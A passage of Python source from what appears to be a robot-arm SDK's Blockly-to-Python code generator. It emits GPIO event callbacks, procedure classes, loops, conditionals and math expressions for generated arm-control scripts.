def __handle_gpio_event(self, gpio_type, block, prefix='', arg_map=None):
if gpio_type.startswith('listen'):
if gpio_type == 'listen_tgpio_digital':
self._append_to_file('\n{}params[\'events\'][\'gpio\'].listen_tgpio_digital = True'.format(prefix))
elif gpio_type == 'listen_tgpio_analog':
self._append_to_file('\n{}params[\'events\'][\'gpio\'].listen_tgpio_analog = True'.format(prefix))
elif gpio_type == 'listen_cgpio_state':
self._append_to_file('\n{}params[\'events\'][\'gpio\'].listen_cgpio_state = True'.format(prefix))
else:
return
old_prefix = prefix
else:
fields = self.get_nodes('field', root=block)
io = fields[0].text
trigger = fields[1].text
if 'gpio' not in self._events:
num = 1
else:
if gpio_type not in self._events['gpio']:
num = 1
else:
num = self._events['gpio'][gpio_type] + 1
if gpio_type == 'tgpio_digital':
name = 'tool_gpio_{}_digital_is_changed_callback_{}'.format(io, num)
self._append_to_file('\n\n{}# Define Tool GPIO-{} DIGITAL is changed callback'.format(prefix, io))
elif gpio_type == 'tgpio_analog':
name = 'tool_gpio_{}_analog_is_changed_callback_{}'.format(io, num)
self._append_to_file('\n\n{}# Define Tool GPIO-{} ANALOG is changed callback'.format(prefix, io))
elif gpio_type == 'cgpio_digital':
name = 'controller_gpio_{}_digital_is_changed_callback_{}'.format(io, num)
self._append_to_file('\n\n{}# Define Controller GPIO-{} DIGITAL is {} callback'.format(prefix, io, trigger))
elif gpio_type == 'cgpio_analog':
name = 'controller_gpio_{}_analog_is_changed_callback_{}'.format(io, num)
self._append_to_file('\n\n{}# Define Controller GPIO-{} ANALOG is changed callback'.format(prefix, io))
else:
return
self._append_to_file('{}def {}():'.format(prefix, name))
old_prefix = prefix
prefix = ' ' + prefix
statement = self.get_node('statement', root=block)
if statement:
self._append_to_file('{}def _callback():'.format(prefix))
self.parse(statement, prefix + ' ', arg_map=arg_map)
self._append_to_file('{}_callback() if not params[\'callback_in_thread\'] else threading.Thread(target=_callback, daemon=True).start()'.format(prefix))
else:
self._append_to_file('{}pass'.format(prefix))
if gpio_type == 'tgpio_digital':
self._append_to_file(
'\n{}params[\'events\'][\'gpio\'].tgpio_digital_callbacks.append({{'
'\'io\': {}, \'trigger\': {}, \'op\': \'==\', \'callback\': {}}})'.format(
old_prefix, io, 1 if trigger == 'HIGH' else 0, name))
elif gpio_type == 'tgpio_analog':
op = self._ops2.get(trigger)
trigger = fields[2].text
self._append_to_file(
'\n{}params[\'events\'][\'gpio\'].tgpio_analog_callbacks.append({{'
'\'io\': {}, \'trigger\': {}, \'op\': \'{}\', \'callback\': {}}})'.format(
old_prefix, io, trigger, op, name))
elif gpio_type == 'cgpio_digital':
self._append_to_file(
'\n{}params[\'events\'][\'gpio\'].cgpio_callbacks.append({{'
'\'type\': \'digital\', \'io\': {}, \'trigger\': {}, \'op\': \'{}\', \'callback\': {}}})'.format(
old_prefix, io, 1 if trigger == 'HIGH' else 0, '==', name))
elif gpio_type == 'cgpio_analog':
op = self._ops2.get(trigger)
trigger = fields[2].text
self._append_to_file(
'\n{}params[\'events\'][\'gpio\'].cgpio_callbacks.append({{'
'\'type\': \'analog\', \'io\': {}, \'trigger\': {}, \'op\': \'{}\', \'callback\': {}}})'.format(
old_prefix, io, trigger, op, name))
else:
return
self._append_to_file('{}if not params[\'events\'][\'gpio\'].alive:'.format(old_prefix))
self._append_to_file('{} params[\'events\'][\'gpio\'].start()'.format(old_prefix))
if 'gpio' not in self._events:
name2 = 'EventGPIOThread'
self._insert_to_file(self.index, '\n\n# Define GPIO callback handle thread')
self._insert_to_file(self.index, 'class {}(threading.Thread):'.format(name2))
self._insert_to_file(self.index, ' def __init__(self, *args, **kwargs):'
'\n threading.Thread.__init__(self, *args, **kwargs)')
self._insert_to_file(self.index, ' self.daemon = True')
self._insert_to_file(self.index, ' self.alive = False')
self._insert_to_file(self.index, ' self.is_init_tgpio_digital = False')
self._insert_to_file(self.index, ' self.is_init_tgpio_analog = False')
self._insert_to_file(self.index, ' self.is_init_cgpio_state = False')
self._insert_to_file(self.index, ' self.listen_tgpio_digital = False')
self._insert_to_file(self.index, ' self.listen_tgpio_analog = False')
self._insert_to_file(self.index, ' self.listen_cgpio_state = False')
self._insert_to_file(self.index, ' self.values = {'
'\'tgpio\': {\'digital\': [0] * 2, \'analog\': [0] * 2, \'digital_o\': [0] * 2, \'analog_o\': [0] * 2},'
'\'cgpio\': {\'digital\': [1] * 16, \'analog\': [0] * 2, \'digital_o\': [1] * 16, \'analog_o\': [0] * 2}}')
self._insert_to_file(self.index, ' self.tgpio_digital_callbacks = []')
self._insert_to_file(self.index, ' self.tgpio_analog_callbacks = []')
self._insert_to_file(self.index, ' self.cgpio_callbacks = []')
self._insert_to_file(self.index, '\n def cgpio_digitals_is_matchs_bin(self, bin_val):')
self._insert_to_file(self.index, ' digitals_bin = \'\'.join(map(str, self.values[\'cgpio\'][\'digital\']))')
self._insert_to_file(self.index, ' length = min(len(digitals_bin), len(bin_val))')
self._insert_to_file(self.index, ' bin_val_ = bin_val[::-1]')
self._insert_to_file(self.index, ' for i in range(length):')
self._insert_to_file(self.index, ' if bin_val_[i] != digitals_bin[i]:')
self._insert_to_file(self.index, ' return False')
self._insert_to_file(self.index, ' return True')
self._insert_to_file(self.index, '\n def run(self):')
self._insert_to_file(self.index, ' self.alive = True')
self._insert_to_file(self.index, ' while arm.connected and arm.error_code == 0 and not params[\'quit\']:')
self._insert_to_file(self.index, ' if self.listen_tgpio_digital or len(self.tgpio_digital_callbacks) > 0:')
self._insert_to_file(self.index, ' _, values = arm.get_tgpio_digital()')
self._insert_to_file(self.index, ' if _ == 0:')
self._insert_to_file(self.index, ' if self.is_init_tgpio_digital:')
self._insert_to_file(self.index, ' for item in self.tgpio_digital_callbacks:')
self._insert_to_file(self.index, ' for io in range(2):')
self._insert_to_file(self.index, ' if item[\'io\'] == io and eval(\'{} {} {}\'.format(values[io], item[\'op\'], item[\'trigger\'])) and not eval(\'{} {} {}\'.format(self.values[\'tgpio\'][\'digital\'][io], item[\'op\'], item[\'trigger\'])):')
# self._insert_to_file(self.index, ' if item[\'io\'] == io and values[io] {op} item[\'trigger\'] and not (values[io] {op} self.values[\'tgpio\'][\'digital\'][io]):'.format(op='item[\'op\']'))
self._insert_to_file(self.index, ' item[\'callback\']()')
self._insert_to_file(self.index, ' self.values[\'tgpio\'][\'digital\'] = values')
self._insert_to_file(self.index, ' self.is_init_tgpio_digital = True')
self._insert_to_file(self.index, ' if self.listen_tgpio_analog or len(self.tgpio_analog_callbacks) > 0:')
self._insert_to_file(self.index, ' _, values = arm.get_tgpio_analog()')
self._insert_to_file(self.index, ' if _ == 0:')
self._insert_to_file(self.index, ' if self.is_init_tgpio_analog:')
self._insert_to_file(self.index, ' for item in self.tgpio_analog_callbacks:')
self._insert_to_file(self.index, ' for io in range(2):')
self._insert_to_file(self.index, ' if item[\'io\'] == io and eval(\'{} {} {}\'.format(values[io], item[\'op\'], item[\'trigger\'])) and not eval(\'{} {} {}\'.format(self.values[\'tgpio\'][\'analog\'][io], item[\'op\'], item[\'trigger\'])):')
# self._insert_to_file(self.index, ' if item[\'io\'] == io and values[io] {op} item[\'trigger\'] and not (values[io] {op} self.values[\'tgpio\'][\'analog\'][io]):'.format(op='item[\'op\']'))
self._insert_to_file(self.index, ' item[\'callback\']()')
self._insert_to_file(self.index, ' self.values[\'tgpio\'][\'analog\'] = values')
self._insert_to_file(self.index, ' self.is_init_tgpio_analog = True')
self._insert_to_file(self.index, ' if self.listen_cgpio_state or len(self.cgpio_callbacks) > 0:')
self._insert_to_file(self.index, ' _, values = arm.get_cgpio_state()')
self._insert_to_file(self.index, ' if _ == 0:')
self._insert_to_file(self.index, ' digitals = [values[3] >> i & 0x0001 if values[10][i] in [0, 255] else 1 for i in range(len(values[10]))]')
self._insert_to_file(self.index, ' digitals_o = [values[5] >> i & 0x0001 for i in range(len(values[11]))]')
self._insert_to_file(self.index, ' analogs = [values[6], values[7]]')
self._insert_to_file(self.index, ' analogs_o = [values[8], values[9]]')
self._insert_to_file(self.index, ' if self.is_init_cgpio_state:')
self._insert_to_file(self.index, ' for item in self.cgpio_callbacks:')
self._insert_to_file(self.index, ' if item[\'type\'] == \'digital\':')
self._insert_to_file(self.index, ' for io in range(len(digitals)):')
self._insert_to_file(self.index, ' if item[\'io\'] == io and eval(\'{} {} {}\'.format(digitals[io], item[\'op\'], item[\'trigger\'])) and not eval(\'{} {} {}\'.format(self.values[\'cgpio\'][\'digital\'][io], item[\'op\'], item[\'trigger\'])):')
# self._insert_to_file(self.index, ' if item[\'io\'] == io and values[io] {op} item[\'trigger\'] and not (values[io] {op} self.values[\'cgpio\'][\'digital\'][io]):'.format(op='item[\'op\']'))
self._insert_to_file(self.index, ' item[\'callback\']()')
self._insert_to_file(self.index, ' elif item[\'type\'] == \'analog\':')
self._insert_to_file(self.index, ' for io in range(2):')
self._insert_to_file(self.index, ' if item[\'io\'] == io and eval(\'{} {} {}\'.format(analogs[io], item[\'op\'], item[\'trigger\'])) and not eval(\'{} {} {}\'.format(self.values[\'cgpio\'][\'analog\'][io], item[\'op\'], item[\'trigger\'])):')
# self._insert_to_file(self.index, ' if item[\'io\'] == io and values[io] {op} item[\'trigger\'] and not (values[io] {op} self.values[\'cgpio\'][\'analog\'][io]):'.format(op='item[\'op\']'))
self._insert_to_file(self.index, ' item[\'callback\']()')
self._insert_to_file(self.index, ' self.values[\'cgpio\'][\'digital\'] = digitals')
self._insert_to_file(self.index, ' self.values[\'cgpio\'][\'analog\'] = analogs')
self._insert_to_file(self.index, ' self.values[\'cgpio\'][\'digital_o\'] = digitals_o')
self._insert_to_file(self.index, ' self.values[\'cgpio\'][\'analog_o\'] = analogs_o')
self._insert_to_file(self.index, ' self.is_init_cgpio_state = True')
self._insert_to_file(self.index, ' time.sleep(0.1)')
self._insert_to_file(self.index, '\nparams[\'events\'][\'gpio\'] = {}()'.format(name2))
self._events['gpio'] = {}
if not gpio_type.startswith('listen'):
if gpio_type not in self._events['gpio']:
self._events['gpio'][gpio_type] = 2
else:
self._events['gpio'][gpio_type] += 1
self._hasEvent = True
def _handle_event_gpio_digital(self, block, prefix='', arg_map=None):
self.__handle_gpio_event('tgpio_digital', block, prefix, arg_map=arg_map)
def _handle_event_gpio_analog(self, block, prefix='', arg_map=None):
self.__handle_gpio_event('tgpio_analog', block, prefix, arg_map=arg_map)
def _handle_event_gpio_controller_digital(self, block, prefix, arg_map=None):
self.__handle_gpio_event('cgpio_digital', block, prefix, arg_map=arg_map)
def _handle_event_gpio_controller_analog(self, block, prefix, arg_map=None):
self.__handle_gpio_event('cgpio_analog', block, prefix, arg_map=arg_map)
def _handle_gpio_controller_digitals_listen(self, block, prefix, arg_map=None):
self.__handle_gpio_event('listen_cgpio_state', block, prefix, arg_map=arg_map)
def _handle_event_gpio_controller_digital_di(self, block, prefix, arg_map=None):
self.__handle_gpio_event('cgpio_digital', block, prefix, arg_map=arg_map)
# def _handle_event_gpio_digital(self, block, prefix=''):
# fields = self.get_nodes('field', root=block)
# io = fields[0].text
# trigger = fields[1].text
#
# if 'gpio' not in self._events:
# num = 1
# else:
# num = self._events['gpio'] + 1
# name = '{}_io{}_is_{}_{}'.format(block.attrib['type'], io, trigger.lower(), num)
# self._append_to_file('\n\n{}# Define TGPIO-{} is {} callback'.format(prefix, io, trigger))
# self._append_to_file('{}def {}():'.format(prefix, name))
# old_prefix = prefix
# prefix = ' ' + prefix
# statement = self.get_node('statement', root=block)
# if statement:
# self.parse(statement, prefix)
# else:
# self._append_to_file('{}pass'.format(prefix))
# self._append_to_file('\n{}params[\'events\'][\'gpio\'].callbacks[\'IO{}\'][{}].append({})'.format(
# old_prefix, io, 1 if trigger == 'HIGH' else 0, name))
# self._append_to_file('{}if not params[\'events\'][\'gpio\'].alive:'.format(old_prefix))
# self._append_to_file('{} params[\'events\'][\'gpio\'].start()'.format(old_prefix))
#
# if 'gpio' not in self._events:
# name2 = 'EventGPIOThread'.format(io, trigger.capitalize())
# self._insert_to_file(self.index, '\n\n# Define GPIO callback handle thread')
# self._insert_to_file(self.index, 'class {}(threading.Thread):'.format(name2))
# self._insert_to_file(self.index, ' def __init__(self, *args, **kwargs):'
# '\n threading.Thread.__init__(self, *args, **kwargs)')
# self._insert_to_file(self.index, ' self.daemon = True')
# self._insert_to_file(self.index, ' self.alive = False')
# self._insert_to_file(self.index, ' self.digital = [-1, -1]')
# self._insert_to_file(self.index, ' self.callbacks = {\'IO0\': {0: [], 1: []}, '
# '\'IO1\': {0: [], 1: []}}')
# self._insert_to_file(self.index, '\n def run(self):')
# self._insert_to_file(self.index, ' self.alive = True')
# self._insert_to_file(self.index, ' while arm.connected and arm.error_code == 0:')
# self._insert_to_file(self.index, ' _, digital = arm.get_tgpio_digital()')
# self._insert_to_file(self.index, ' if _ == 0:')
# self._insert_to_file(self.index, ' if digital[0] != self.digital[0]:')
# self._insert_to_file(self.index, ' for callback in self.callbacks[\'IO0\'][digital[0]]:')
# self._insert_to_file(self.index, ' callback()')
# self._insert_to_file(self.index, ' if digital[1] != self.digital[1]:')
# self._insert_to_file(self.index, ' for callback in self.callbacks[\'IO1\'][digital[1]]:')
# self._insert_to_file(self.index, ' callback()')
# self._insert_to_file(self.index, ' if _ == 0:')
# self._insert_to_file(self.index, ' self.digital = digital')
# self._insert_to_file(self.index, ' time.sleep(0.1)')
# self._insert_to_file(self.index, '\nparams[\'events\'][\'gpio\'] = {}()'.format(name2))
#
# if 'gpio' not in self._events:
# self._events['gpio'] = 2
# else:
# self._events['gpio'] += 1
#
# self._hasEvent = True
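# Blockly procedure definitions are emitted as @classmethod members of a generated MyDef
# class; procedure arguments are renamed to arg_1..arg_n via arg_map so the call sites and
# the generated bodies stay consistent.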
def _handle_procedures_defnoreturn(self, block, prefix='', arg_map=None):
if not self._func_cls_exist:
name = 'MyDef'
self._insert_to_file(self.first_index, '\n\n# Define MyDef class')
self._insert_to_file(self.first_index, 'class {}(object):'.format(name))
self._insert_to_file(self.first_index,
' def __init__(self, *args, **kwargs):\n pass')
self._func_cls_exist = True
field = self.get_node('field', block).text
if not field:
field = '1'
if field not in self._funcs:
name = 'function_{}'.format(self.func_index)
else:
name = self._funcs[field]
self._is_insert = True
try:
args = self.get_nodes('arg', root=self.get_node('mutation', block))
arg_map_ = None
self._append_to_file('\n @classmethod')
if not args:
self._append_to_file(' def {}(cls):'.format(name))
else:
arg_list = [arg.attrib['name'] for arg in args]
# arg_map_ = {arg: arg for i, arg in enumerate(arg_list)}
arg_map_ = {arg: 'arg_{}'.format(i + 1) for i, arg in enumerate(arg_list)}
self._append_to_file(' def {}(cls, {}):'.format(name, ','.join(map(lambda x: arg_map_[x], arg_list))))
# self._append_to_file(' def {}(cls):'.format(name))
prefix = ' '
comment = self.get_node('comment', block).text
self._append_to_file('{}"""'.format(prefix))
self._append_to_file('{}{}'.format(prefix, comment))
self._append_to_file('{}"""'.format(prefix))
statement = self.get_node('statement', root=block)
if statement:
self.parse(statement, prefix, arg_map=arg_map_)
else:
self._append_to_file('{}pass'.format(prefix))
self._funcs[field] = name
return arg_map_
except:
self._succeed = False
self._is_insert = False
def _handle_procedures_defreturn(self, block, prefix='', arg_map=None):
arg_map_ = self._handle_procedures_defnoreturn(block, prefix)
value = self.get_node('value', root=block)
expression = self.__get_condition_expression(value, arg_map=arg_map_)
self._is_insert = True
prefix = ' '
self._append_to_file('{}return {}'.format(prefix, expression))
self._is_insert = False
def _handle_procedures_callnoreturn(self, block, prefix='', arg_map=None):
mutation = self.get_node('mutation', block).attrib['name']
if not mutation:
mutation = '1'
if mutation in self._funcs:
name = self._funcs[mutation]
else:
name = 'function_{}'.format(self.func_index)
args = self.get_nodes('arg', root=self.get_node('mutation', block))
values = self.get_nodes('value', root=block)
if args and values and len(args) == len(values):
self._append_to_file('{}MyDef.{}({})'.format(prefix, name, ','.join([self.__get_condition_expression(val, arg_map=arg_map) for val in values])))
else:
self._append_to_file('{}MyDef.{}()'.format(prefix, name))
# self._append_to_file('{}MyDef.{}()'.format(prefix, name))
self._funcs[mutation] = name
def _handle_procedures_ifreturn(self, block, prefix='', arg_map=None):
self._is_insert = True
values = self.get_nodes('value', block)
expression = self.__get_condition_expression(values[0], arg_map=arg_map)
self._append_to_file('{}if {}:'.format(prefix, expression))
expression = self.__get_condition_expression(values[1], arg_map=arg_map)
self._append_to_file('{} return {}'.format(prefix, expression))
self._is_insert = False
def _handle_procedures_callreturn(self, block, prefix='', arg_map=None):
self._handle_procedures_callnoreturn(block, prefix, arg_map=arg_map)
def _handle_variables_set(self, block, prefix='', arg_map=None):
field = self.get_node('field', block).text
value = self.get_node('value', root=block)
expression = self.__get_condition_expression(value, arg_map=arg_map)
# self._append_to_file('{}params[\'variables\'][\'{}\'] = {}'.format(prefix, field, expression))
prefix = self.__check_is_quit(prefix)
if arg_map and field in arg_map:
self._append_to_file('{}{} = {}'.format(prefix, arg_map[field], expression))
else:
self._append_to_file('{}params[\'variables\'][\'{}\'] = {}'.format(prefix, field, expression))
# self._append_to_file('{}if \'{}\' not in locals_keys and \'{}\' in locals():'.format(prefix, field, field))
# self._append_to_file('{} {} = {}'.format(prefix, field, expression))
# self._append_to_file('{}else:'.format(prefix))
# self._append_to_file('{} params[\'variables\'][\'{}\'] = {}'.format(prefix, field, expression))
def _handle_math_change(self, block, prefix='', arg_map=None):
field = self.get_node('field', block).text
value = self.get_node('value', root=block)
shadow = self.get_node('shadow', root=value)
val = self.get_node('field', root=shadow).text
# self._append_to_file('{}params[\'variables\'][\'{}\'] += {}'.format(prefix, field, val))
prefix = self.__check_is_quit(prefix)
if arg_map and field in arg_map:
self._append_to_file('{}{} += {}'.format(prefix, arg_map[field], val))
else:
self._append_to_file('{}params[\'variables\'][\'{}\'] += {}'.format(prefix, field, val))
# self._append_to_file('{}if \'{}\' not in locals_keys and \'{}\' in locals():'.format(prefix, field, field))
# self._append_to_file('{} {} += {}'.format(prefix, field, val))
# self._append_to_file('{}else:'.format(prefix))
# self._append_to_file('{} params[\'variables\'][\'{}\'] += {}'.format(prefix, field, val))
def _handle_controls_repeat_ext(self, block, prefix='', arg_map=None):
value = self.get_node('value', root=block)
# times = self.get_nodes('field', root=value, descendant=True)[0].text
times = self.__get_block_val(value, arg_map=arg_map)
self._append_to_file('{}for i in range(int({})):'.format(prefix, times))
prefix = ' ' + prefix
self._append_to_file('{}if params[\'quit\']:'.format(prefix))
self._append_to_file('{} break'.format(prefix))
statement = self.get_node('statement', root=block)
if statement:
if self._highlight_callback:
self._append_to_file('{}t1 = time.time()'.format(prefix))
self.parse(statement, prefix, arg_map=arg_map)
if self._highlight_callback:
self._append_to_file('{}interval = time.time() - t1'.format(prefix))
self._append_to_file('{}if interval < 0.001:'.format(prefix))
self._append_to_file('{} time.sleep(0.001 - interval)'.format(prefix))
else:
self._append_to_file('{}pass'.format(prefix))
# def handle_controls_for(self, block, prefix=''):
# print(block.attrib.get('disabled', False))
def _handle_controls_whileUntil(self, block, prefix='', arg_map=None):
field = self.get_node('field', root=block)
if field.text == 'WHILE':
value = self.get_node('value', root=block)
expression = self.__get_condition_expression(value, arg_map=arg_map)
self._append_to_file('{}while {} and not params[\'quit\']:'.format(prefix, expression))
elif field.text == 'UNTIL':
value = self.get_node('value', root=block)
expression = self.__get_condition_expression(value, arg_map=arg_map)
self._append_to_file('{}while not {} and not params[\'quit\']:'.format(prefix, expression))
prefix = ' ' + prefix
statement = self.get_node('statement', root=block)
if statement:
if self._highlight_callback:
self._append_to_file('{}t1 = time.time()'.format(prefix))
self.parse(statement, prefix, arg_map=arg_map)
if self._highlight_callback:
self._append_to_file('{}interval = time.time() - t1'.format(prefix))
self._append_to_file('{}if interval < 0.001:'.format(prefix))
self._append_to_file('{} time.sleep(0.001 - interval)'.format(prefix))
else:
self._append_to_file('{}pass'.format(prefix))
def _handle_loop_run_forever(self, block, prefix='', arg_map=None):
self._append_to_file('{}while True:'.format(prefix))
prefix = ' ' + prefix
self._append_to_file('{}if params[\'quit\']:'.format(prefix))
self._append_to_file('{} break'.format(prefix))
statement = self.get_node('statement', root=block)
if statement:
if self._highlight_callback:
self._append_to_file('{}t1 = time.time()'.format(prefix))
self.parse(statement, prefix, arg_map=arg_map)
if self._highlight_callback:
self._append_to_file('{}interval = time.time() - t1'.format(prefix))
self._append_to_file('{}if interval < 0.001:'.format(prefix))
self._append_to_file('{} time.sleep(0.001 - interval)'.format(prefix))
else:
self._append_to_file('{}pass'.format(prefix))
def _handle_loop_break(self, block, prefix='', arg_map=None):
self._append_to_file('{}break'.format(prefix))
def _handle_tool_comment(self, block, prefix='', arg_map=None):
field = self.get_node('field', block)
self._append_to_file('{}# {}'.format(prefix, field.text))
statement = self.get_node('statement', block)
if statement:
self.parse(statement, prefix, arg_map=arg_map)
def _handle_tool_app_comment(self, block, prefix='', arg_map=None):
field = self.get_node('field', block)
self._append_to_file('{}# [APP] {}'.format(prefix, field.text))
statement = self.get_node('statement', block)
if statement:
self.parse(statement, prefix, arg_map=arg_map)
def _handle_tool_remark(self, block, prefix='', arg_map=None):
field = self.get_node('field', block)
self._append_to_file('{}# {}'.format(prefix, field.text))
def _handle_controls_if(self, block, prefix='', arg_map=None):
values = self.get_nodes('value', root=block)
statements = self.get_nodes('statement', root=block)
old_prefix = prefix
has_if = False
for i, value in enumerate(values):
prefix = old_prefix
expression = self.__get_condition_expression(value, arg_map=arg_map)
if not has_if:
has_if = True
self._append_to_file('{}if {}:'.format(prefix, expression))
else:
self._append_to_file('{}elif {}:'.format(prefix, expression))
old_prefix = prefix
prefix = ' ' + prefix
statement = None
for st in statements:
if st.attrib['name'][2:] == value.attrib['name'][2:]:
statement = st
break
if statement:
self.parse(statement, prefix, arg_map=arg_map)
else:
self._append_to_file('{}pass'.format(prefix))
for st in statements:
if st.attrib['name'] == 'ELSE':
if has_if:
self._append_to_file('{}else:'.format(old_prefix))
self.parse(st, old_prefix if not has_if else ' ' + old_prefix, arg_map=arg_map)
break
# value = self.get_node('value', root=block)
# expression = self.__get_condition_expression(value)
# self._append_to_file('{}if {}:'.format(prefix, expression))
# old_prefix = prefix
# prefix = ' ' + prefix
# statement_if = self.get_nodes('statement', root=block, name='DO0')
# statement_else = self.get_nodes('statement', root=block, name='ELSE')
# if statement_if:
# self.parse(statement_if[0], prefix)
# if statement_else:
# self._append_to_file('{}else:'.format(old_prefix))
# self.parse(statement_else[0], prefix)
# else:
# self._append_to_file('{}pass'.format(prefix))
# statement = self.get_node('statement', root=block)
# if statement:
# self.parse(statement, prefix)
# else:
# self._append_to_file('{}pass'.format(prefix))
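# Translates a Blockly <value> block into a Python expression string: logic blocks,
# GPIO/suction-cup reads, math blocks, variable lookups and procedure calls all map to the
# corresponding runtime expressions used in the generated script.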
def __get_condition_expression(self, value_block, arg_map=None):
block = self.get_node('block', value_block)
if block is None:
shadow = self.get_node('shadow', root=value_block)
return self.get_node('field', root=shadow).text
if block.attrib['type'] == 'logic_boolean':
return str(self.get_node('field', block).text == 'TRUE')
elif block.attrib['type'] == 'logic_compare':
op = self._ops.get(self.get_node('field', block).text)
cond_a = 0
cond_b = 0
values = self.get_nodes('value', block)
if len(values) > 0:
cond_a = self.__get_condition_expression(values[0], arg_map=arg_map)
if len(values) > 1:
cond_b = self.__get_condition_expression(values[1], arg_map=arg_map)
return '{} {} {}'.format(cond_a, op, cond_b)
elif block.attrib['type'] == 'logic_operation':
op = self.get_node('field', block).text.lower()
cond_a = False
cond_b = False
values = self.get_nodes('value', block)
if len(values) > 0:
cond_a = self.__get_condition_expression(values[0], arg_map=arg_map)
if len(values) > 1:
cond_b = self.__get_condition_expression(values[1], arg_map=arg_map)
return '{} {} {}'.format(cond_a, op, cond_b)
elif block.attrib['type'] == 'logic_negate':
value = self.get_node('value', root=block)
return 'not ({})'.format(self.__get_condition_expression(value, arg_map=arg_map))
elif block.attrib['type'] == 'gpio_get_digital':
io = self.get_node('field', block).text
return 'arm.get_tgpio_digital({})[{}]'.format(io, 1)
elif block.attrib['type'] == 'gpio_get_analog':
io = self.get_node('field', block).text
return 'arm.get_tgpio_analog({})[{}]'.format(io, 1)
elif block.attrib['type'] == 'gpio_get_controller_digital':
io = self.get_node('field', block).text
return 'arm.get_cgpio_digital({})[{}]'.format(io, 1)
elif block.attrib['type'] == 'gpio_get_controller_analog':
io = self.get_node('field', block).text
return 'arm.get_cgpio_analog({})[{}]'.format(io, 1)
elif block.attrib['type'] == 'gpio_get_ci':
io = self.get_node('field', block).text
return 'params[\'events\'][\'gpio\'].values[\'cgpio\'][\'digital\'][{}] if \'gpio\' in params[\'events\'] else 1'.format(io)
elif block.attrib['type'] == 'gpio_get_co':
io = self.get_node('field', block).text
return 'params[\'events\'][\'gpio\'].values[\'cgpio\'][\'digital_o\'][{}] if \'gpio\' in params[\'events\'] else 0'.format(io)
elif block.attrib['type'] == 'gpio_get_ai':
io = self.get_node('field', block).text
return 'params[\'events\'][\'gpio\'].values[\'cgpio\'][\'analog\'][{}] if \'gpio\' in params[\'events\'] else 0'.format(io)
elif block.attrib['type'] == 'gpio_get_ao':
io = self.get_node('field', block).text
return 'params[\'events\'][\'gpio\'].values[\'cgpio\'][\'analog_o\'][{}] if \'gpio\' in params[\'events\'] else 0'.format(io)
elif block.attrib['type'] == 'gpio_match_controller_digitals_bin':
bin_val = self.get_node('field', block).text
return 'params[\'events\'][\'gpio\'].cgpio_digitals_is_matchs_bin(\'{}\') if \'gpio\' in params[\'events\'] else False'.format(
bin_val)
elif block.attrib['type'] == 'get_suction_cup':
return 'arm.get_suction_cup()[{}]'.format(1)
elif block.attrib['type'] == 'check_air_pump_state':
fields = self.get_nodes('field', root=block)
state = 1 if fields[0].text == 'ON' else 0
timeout = float(fields[1].text)
return 'arm.arm.check_air_pump_state({}, timeout={})'.format(state, timeout)
elif block.attrib['type'] == 'check_bio_gripper_is_catch':
fields = self.get_nodes('field', root=block)
timeout = float(fields[0].text)
return 'arm.arm.check_bio_gripper_is_catch(timeout={}) == True'.format(timeout)
elif block.attrib['type'] == 'check_robotiq_is_catch':
fields = self.get_nodes('field', root=block)
timeout = float(fields[0].text)
return 'arm.arm.check_robotiq_is_catch(timeout={}) == True'.format(timeout)
elif block.attrib['type'] == 'math_number':
val = self.get_node('field', block).text
return val
elif block.attrib['type'] == 'math_arithmetic':
field = self.get_node('field', block).text
values = self.get_nodes('value', block)
if len(values) > 1:
val_a = self.__get_block_val(values[0], arg_map=arg_map)
val_b = self.__get_block_val(values[1], arg_map=arg_map)
if field == 'ADD':
return '({} + {})'.format(val_a, val_b)
elif field == 'MINUS':
return '({} - {})'.format(val_a, val_b)
elif field == 'MULTIPLY':
return '({} * {})'.format(val_a, val_b)
elif field == 'DIVIDE':
return '({} / {})'.format(val_a, val_b)
elif field == 'POWER':
return 'pow({}, {})'.format(val_a, val_b)
elif block.attrib['type'] == 'math_number_property':
field = self.get_node('field', block).text
values = self.get_nodes('value', block)
if len(values) >= 1:
val_a = self.__get_block_val(values[0], arg_map=arg_map)
if field == 'EVEN':
# even number
return '{} % 2 == 0'.format(val_a)
elif field == 'ODD':
# odd number
return '{} % 2 == 1'.format(val_a)
elif field == 'PRIME':
# prime number
return 'utils.is_prime({})'.format(val_a)
elif field == 'WHOLE':
return '{} % 1 == 0'.format(val_a)
elif field == 'POSITIVE':
# positive number
return '{} > 0'.format(val_a)
elif field == 'NEGATIVE':
# negative number
return '{} < 0'.format(val_a)
elif field == 'DIVISIBLE_BY':
# divisible by
if len(values) > 1:
val_b = self.__get_block_val(values[1], arg_map=arg_map)
else:
val_b = 0
return '{} % {} == 0'.format(val_a, val_b)
elif block.attrib['type'] == 'math_random_int':
values = self.get_nodes('value', block)
if len(values) > 1:
val_a = self.__get_block_val(values[0], arg_map=arg_map)
val_b = self.__get_block_val(values[1], arg_map=arg_map)
return 'random.randint({}, {})'.format(val_a, val_b)
elif block.attrib['type'] == 'math_round':
field = self.get_node('field', block).text
values = self.get_nodes('value', block)
if len(values) >= 1:
val_a = self.__get_block_val(values[0], arg_map=arg_map)
if field == 'ROUND':
# round to the nearest integer
return 'round({})'.format(val_a)
elif field == 'ROUNDUP':
# round up (ceiling)
return 'math.ceil({})'.format(val_a)
elif field == 'ROUNDDOWN':
# round down (floor)
return 'math.floor({})'.format(val_a)
elif block.attrib['type'] == 'math_single':
# arithmetic functions (single operand)
field = self.get_node('field', block).text
values = self.get_nodes('value', block)
if len(values) >= 1:
val_a = self.__get_block_val(values[0], arg_map=arg_map)
if field == 'ROOT':
# square root
return 'math.sqrt({})'.format(val_a)
elif field == 'ABS':
# absolute value
return 'abs({})'.format(val_a)
elif field == 'NEG':
# negation
return '-{}'.format(val_a)
elif field == 'LN':
# ln
return 'math.log({})'.format(val_a)
elif field == 'LOG10':
# log10
return '(math.log({}) / math.log(10))'.format(val_a)
elif field == 'EXP':
# exp
return 'math.exp({})'.format(val_a)
elif field == 'POW10':
# 10 raised to the given power
return 'math.pow(10, {})'.format(val_a)
elif block.attrib['type'] == 'math_trig':
# trigonometric functions
field = self.get_node('field', block).text
values = self.get_nodes('value', block)
if len(values) >= 1:
val_a = self.__get_block_val(values[0], arg_map=arg_map)
if field == 'SIN':
return 'math.sin({})'.format(val_a)
elif field == 'COS':
return 'math.cos({})'.format(val_a)
elif field == 'TAN':
return 'math.tan({})'.format(val_a)
elif field == 'ASIN':
return 'math.asin({})'.format(val_a)
elif field == 'ACOS':
return 'math.acos({})'.format(val_a)
elif field == 'ATAN':
return 'math.atan({})'.format(val_a)
elif block.attrib['type'] == 'math_constant':
# constants
field = self.get_node('field', block).text
if field == 'PI':
return 'math.pi'
elif field == 'E':
return 'math.e'
elif field == 'GOLDEN_RATIO':
